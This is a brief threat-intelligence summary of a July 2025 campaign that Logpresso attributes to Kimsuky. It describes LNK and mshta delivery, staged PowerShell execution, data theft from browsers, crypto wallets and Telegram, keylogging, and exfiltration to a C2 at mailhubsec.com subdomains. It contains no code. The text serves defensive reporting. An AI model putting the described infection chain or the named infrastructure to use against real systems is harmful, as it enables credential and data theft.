Logpresso attributes a late-July 2025 campaign to Kimsuky that used compressed archives with sex-offender and tax-notice themes to deliver deceptive Windows shortcut files. When opened, the LNK chain runs mshta.exe to retrieve HTA and log files, shows a decoy password file, decrypts an AES-protected ZIP payload, and launches PowerShell and script stages. The malware collects system details, browser data, cryptocurrency wallet extensions, Telegram sessions, NPKI/GPKI certificates, recent documents, keyword-matched files, keystrokes, and clipboard content before encrypting and exfiltrating data. Its C2 at mailhubsec.com subdomains supports file upload, file download, PowerShell command execution, and DLL execution commands, with beaconing every ten minutes and 4 MB encrypted upload chunks. Additional loader activity uses RC4-decrypted payloads and reflective DLL injection into Chrome and Edge processes, expanding the post-infection capability set.